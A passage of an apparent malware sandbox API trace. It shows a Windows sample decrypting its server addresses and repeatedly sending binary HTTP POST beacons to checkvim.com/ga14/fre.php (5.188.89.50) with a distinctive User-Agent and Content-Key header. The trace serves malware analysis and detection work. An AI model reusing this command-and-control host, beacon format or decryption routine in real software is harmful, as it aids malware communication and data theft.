(lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0227.981] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0227.982] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0227.983] GetProcessHeap () returned 0x840000 [0227.983] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871178 [0227.983] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0227.984] GetProcessHeap () returned 0x840000 [0227.984] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871178 | out: hHeap=0x840000) returned 1 [0227.984] GetProcessHeap () returned 0x840000 [0227.984] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0227.984] GetProcessHeap () returned 0x840000 [0227.984] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0227.984] GetProcessHeap () returned 0x840000 [0227.984] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f710 [0227.985] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.985] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0227.990] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.990] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0227.997] GetProcessHeap () returned 0x840000 [0227.997] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0227.998] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.998] CryptImportKey (in: hProv=0x86fce8, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e5b0) returned 1 [0227.999] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0227.999] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0228.000] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.000] CryptSetKeyParam (hKey=0x87e5b0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.000] GetProcessHeap () returned 0x840000 [0228.000] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0228.001] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.001] CryptDecrypt (in: hKey=0x87e5b0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f710, pdwDataLen=0x19f9a4 | out: pbData=0x87f710, pdwDataLen=0x19f9a4) returned 1 [0228.002] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.002] CryptDestroyKey (hKey=0x87e5b0) returned 1 [0228.003] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.003] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0228.003] GetProcessHeap () returned 0x840000 [0228.003] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0228.004] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.004] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0228.005] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.006] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0228.006] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.007] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0228.007] GetProcessHeap () returned 0x840000 [0228.007] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871510 [0228.007] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0228.010] GetProcessHeap () returned 0x840000 [0228.010] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0228.010] socket (af=2, type=1, protocol=6) returned 0x2fc [0228.011] connect (s=0x2fc, name=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0228.081] FreeAddrInfoW (pAddrInfo=0x871128*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b48*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0228.081] GetProcessHeap () returned 0x840000 [0228.081] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86fdf8 [0228.082] GetProcessHeap () returned 0x840000 [0228.082] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0228.082] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0228.083] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0228.083] GetProcessHeap () returned 0x840000 [0228.083] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0228.084] GetProcessHeap () returned 0x840000 [0228.084] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0228.084] GetProcessHeap () returned 0x840000 [0228.084] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f5f0 [0228.084] GetProcessHeap () returned 0x840000 [0228.084] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0228.084] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0228.085] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0228.085] GetProcessHeap () returned 0x840000 [0228.085] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0228.085] GetProcessHeap () returned 0x840000 [0228.085] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0228.085] send (s=0x2fc, buf=0x873a58*, len=237, flags=0) returned 237 [0228.086] send (s=0x2fc, buf=0x87eb58*, len=159, flags=0) returned 159 [0228.086] GetProcessHeap () returned 0x840000 [0228.086] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0228.086] recv (in: s=0x2fc, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0228.435] GetProcessHeap () returned 0x840000 [0228.435] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0228.435] GetProcessHeap () returned 0x840000 [0228.435] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0228.435] GetProcessHeap () returned 0x840000 [0228.435] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0228.435] GetProcessHeap () returned 0x840000 [0228.435] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86fdf8 | out: hHeap=0x840000) returned 1 [0228.436] closesocket (s=0x2fc) returned 0 [0228.436] GetProcessHeap () returned 0x840000 [0228.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0228.436] GetProcessHeap () returned 0x840000 [0228.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0228.436] GetProcessHeap () returned 0x840000 [0228.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f710 | out: hHeap=0x840000) returned 1 [0228.436] GetProcessHeap () returned 0x840000 [0228.436] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871510 | out: hHeap=0x840000) returned 1 [0228.437] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x5ac) returned 0x2fc [0228.438] Sleep (dwMilliseconds=0xea60) [0228.440] GetProcessHeap () returned 0x840000 [0228.440] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fe18 [0228.441] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.441] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0228.582] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.582] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fce8) returned 1 [0228.590] GetProcessHeap () returned 0x840000 [0228.599] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0228.599] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.600] CryptImportKey (in: hProv=0x86fce8, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e370) returned 1 [0228.601] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.601] CryptSetKeyParam (hKey=0x87e370, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0228.602] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.603] CryptSetKeyParam (hKey=0x87e370, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.603] GetProcessHeap () returned 0x840000 [0228.603] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0228.604] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.604] CryptDecrypt (in: hKey=0x87e370, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87fe18, pdwDataLen=0x19f9a4 | out: pbData=0x87fe18, pdwDataLen=0x19f9a4) returned 1 [0228.605] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.605] CryptDestroyKey (hKey=0x87e370) returned 1 [0228.606] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.606] CryptReleaseContext (hProv=0x86fce8, dwFlags=0x0) returned 1 [0228.606] GetProcessHeap () returned 0x840000 [0228.606] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0228.617] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.617] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0228.618] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.619] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0228.620] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.626] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0228.627] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.627] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0228.628] GetProcessHeap () returned 0x840000 [0228.628] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871600 [0228.628] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0228.628] GetProcessHeap () returned 0x840000 [0228.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871600 | out: hHeap=0x840000) returned 1 [0228.628] GetProcessHeap () returned 0x840000 [0228.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0228.628] GetProcessHeap () returned 0x840000 [0228.628] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87fe18 | out: hHeap=0x840000) returned 1 [0228.628] GetProcessHeap () returned 0x840000 [0228.628] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f5f0 [0228.629] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.630] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0228.636] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.636] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86f248) returned 1 [0228.645] GetProcessHeap () returned 0x840000 [0228.645] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x870848 [0228.646] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.646] CryptImportKey (in: hProv=0x86f248, pbData=0x870848, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e270) returned 1 [0228.647] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.647] CryptSetKeyParam (hKey=0x87e270, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0228.648] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.648] CryptSetKeyParam (hKey=0x87e270, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0228.648] GetProcessHeap () returned 0x840000 [0228.649] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870848 | out: hHeap=0x840000) returned 1 [0228.649] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.650] CryptDecrypt (in: hKey=0x87e270, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f5f0, pdwDataLen=0x19f9a4 | out: pbData=0x87f5f0, pdwDataLen=0x19f9a4) returned 1 [0228.651] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.651] CryptDestroyKey (hKey=0x87e270) returned 1 [0228.652] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0228.652] CryptReleaseContext (hProv=0x86f248, dwFlags=0x0) returned 1 [0228.652] GetProcessHeap () returned 0x840000 [0228.652] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x870228 [0228.653] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.653] StrStrA (lpFirst="http://checkvim.com/ga14/fre.php", lpSrch="http://") returned="http://checkvim.com/ga14/fre.php" [0228.654] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.654] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch="/") returned="/ga14/fre.php" [0228.655] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0228.656] StrStrA (lpFirst="checkvim.com/ga14/fre.php", lpSrch=":") returned 0x0 [0228.656] GetProcessHeap () returned 0x840000 [0228.656] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871498 [0228.656] getaddrinfo (in: pNodeName="checkvim.com", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) returned 0 [0228.658] GetProcessHeap () returned 0x840000 [0228.658] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x4) returned 0x871b08 [0228.658] socket (af=2, type=1, protocol=6) returned 0x300 [0228.658] connect (s=0x300, name=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), namelen=16) returned 0 [0228.733] FreeAddrInfoW (pAddrInfo=0x871600*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x10, ai_canonname=0x0, ai_addr=0x878b90*(sa_family=2, sin_port=0x50, sin_addr="5.188.89.50"), ai_next=0x0)) [0228.733] GetProcessHeap () returned 0x840000 [0228.733] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x7d) returned 0x86f248 [0228.733] GetProcessHeap () returned 0x840000 [0228.733] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x201b) returned 0x8805c8 [0228.734] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0228.735] wvsprintfA (in: param_1=0x8805c8, param_2="POST %s HTTP/1.0\r\nUser-Agent: %s\r\nHost: %s\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\n") returned 172 [0228.735] GetProcessHeap () returned 0x840000 [0228.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xae) returned 0x870448 [0228.735] GetProcessHeap () returned 0x840000 [0228.735] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0228.735] GetProcessHeap () returned 0x840000 [0228.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x3e) returned 0x87f8c0 [0228.735] GetProcessHeap () returned 0x840000 [0228.735] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x1fdc) returned 0x8805c8 [0228.736] LoadLibraryW (lpLibFileName="user32") returned 0x76300000 [0228.737] wvsprintfA (in: param_1=0x8805c8, param_2="%sContent-Key: %X\r\nContent-Length: %i\r\nConnection: close\r\n\r\n", arglist=0x19f988 | out: param_1="POST /ga14/fre.php HTTP/1.0\r\nUser-Agent: Mozilla/4.08 (Charon; Inferno)\r\nHost: checkvim.com\r\nAccept: */*\r\nContent-Type: application/octet-stream\r\nContent-Encoding: binary\r\nContent-Key: 66369A18\r\nContent-Length: 159\r\nConnection: close\r\n\r\n") returned 237 [0228.737] GetProcessHeap () returned 0x840000 [0228.737] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xef) returned 0x873a58 [0228.737] GetProcessHeap () returned 0x840000 [0228.737] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8805c8 | out: hHeap=0x840000) returned 1 [0228.737] send (s=0x300, buf=0x873a58*, len=237, flags=0) returned 237 [0228.738] send (s=0x300, buf=0x87eb58*, len=159, flags=0) returned 159 [0228.738] GetProcessHeap () returned 0x840000 [0228.738] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0xfd0) returned 0x8765b0 [0228.738] recv (in: s=0x300, buf=0x8765b0, len=4048, flags=0 | out: buf=0x8765b0*) returned 237 [0229.104] GetProcessHeap () returned 0x840000 [0229.104] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x873a58 | out: hHeap=0x840000) returned 1 [0229.104] GetProcessHeap () returned 0x840000 [0229.104] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f8c0 | out: hHeap=0x840000) returned 1 [0229.105] GetProcessHeap () returned 0x840000 [0229.105] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870448 | out: hHeap=0x840000) returned 1 [0229.105] GetProcessHeap () returned 0x840000 [0229.105] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x86f248 | out: hHeap=0x840000) returned 1 [0229.105] closesocket (s=0x300) returned 0 [0229.105] GetProcessHeap () returned 0x840000 [0229.105] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871b08 | out: hHeap=0x840000) returned 1 [0229.105] GetProcessHeap () returned 0x840000 [0229.105] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x870228 | out: hHeap=0x840000) returned 1 [0229.105] GetProcessHeap () returned 0x840000 [0229.105] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f5f0 | out: hHeap=0x840000) returned 1 [0229.106] GetProcessHeap () returned 0x840000 [0229.106] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871498 | out: hHeap=0x840000) returned 1 [0229.106] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0x41289a, lpParameter=0x8765b0, dwCreationFlags=0x0, lpThreadId=0x19fbb0 | out: lpThreadId=0x19fbb0*=0x92c) returned 0x300 [0229.108] Sleep (dwMilliseconds=0xea60) [0229.109] GetProcessHeap () returned 0x840000 [0229.109] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87f878 [0229.110] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.114] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x10 | out: phProv=0x19f950*=0x0) returned 1 [0229.124] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.124] CryptAcquireContextW (in: phProv=0x19f950, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0x8 | out: phProv=0x19f950*=0x86fb50) returned 1 [0229.131] GetProcessHeap () returned 0x840000 [0229.132] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x24) returned 0x8708a8 [0229.132] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.133] CryptImportKey (in: hProv=0x86fb50, pbData=0x8708a8, dwDataLen=0x24, hPubKey=0x0, dwFlags=0x0, phKey=0x19f954 | out: phKey=0x19f954*=0x87e4f0) returned 1 [0229.134] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.134] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x4, pbData=0x19f94c*=0x1, dwFlags=0x0) returned 1 [0229.135] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.135] CryptSetKeyParam (hKey=0x87e4f0, dwParam=0x1, pbData=0x418960, dwFlags=0x0) returned 1 [0229.135] GetProcessHeap () returned 0x840000 [0229.135] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x8708a8 | out: hHeap=0x840000) returned 1 [0229.136] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.136] CryptDecrypt (in: hKey=0x87e4f0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x87f878, pdwDataLen=0x19f9a4 | out: pbData=0x87f878, pdwDataLen=0x19f9a4) returned 1 [0229.137] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.137] CryptDestroyKey (hKey=0x87e4f0) returned 1 [0229.138] LoadLibraryW (lpLibFileName="ADVAPI32") returned 0x76a90000 [0229.138] CryptReleaseContext (hProv=0x86fb50, dwFlags=0x0) returned 1 [0229.138] GetProcessHeap () returned 0x840000 [0229.138] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x212) returned 0x872af8 [0229.139] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.139] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="http://") returned 0x0 [0229.140] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.140] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="https://") returned 0x0 [0229.141] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.144] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch="/") returned 0x0 [0229.145] LoadLibraryW (lpLibFileName="shlwapi") returned 0x76f60000 [0229.145] StrStrA (lpFirst="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", lpSrch=":") returned 0x0 [0229.146] GetProcessHeap () returned 0x840000 [0229.146] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x20) returned 0x871330 [0229.146] getaddrinfo (in: pNodeName="\x97\x8b\x8b\x8fÅÐÐ\x9c\x97\x9a\x9c\x94\x89\x96\x92Ñ\x9c\x90\x92Ð\x98\x9eÎËÐ\x99\x8d\x9aÑ\x8f\x97\x8f", pServiceName="80", pHints=0x19f960*(ai_flags=0, ai_family=2, ai_socktype=1, ai_protocol=6, ai_addrlen=0x0, ai_canonname=0x0, ai_addr=0x0, ai_next=0x0), ppResult=0x19f980 | out: ppResult=0x19f980*=0x0) returned 11001 [0229.146] GetProcessHeap () returned 0x840000 [0229.146] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x871330 | out: hHeap=0x840000) returned 1 [0229.146] GetProcessHeap () returned 0x840000 [0229.146] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x872af8 | out: hHeap=0x840000) returned 1 [0229.146] GetProcessHeap () returned 0x840000 [0229.146] HeapFree (in: hHeap=0x840000, dwFlags=0x0, lpMem=0x87f878 | out: hHeap=0x840000) returned 1 [0229.146] GetProcessHeap () returned 0x840000 [0229.146] RtlAllocateHeap (HeapHandle=0x840000, Flags=0x0, Size=0x40) returned 0x87fea8 [0229.147] LoadLibraryW 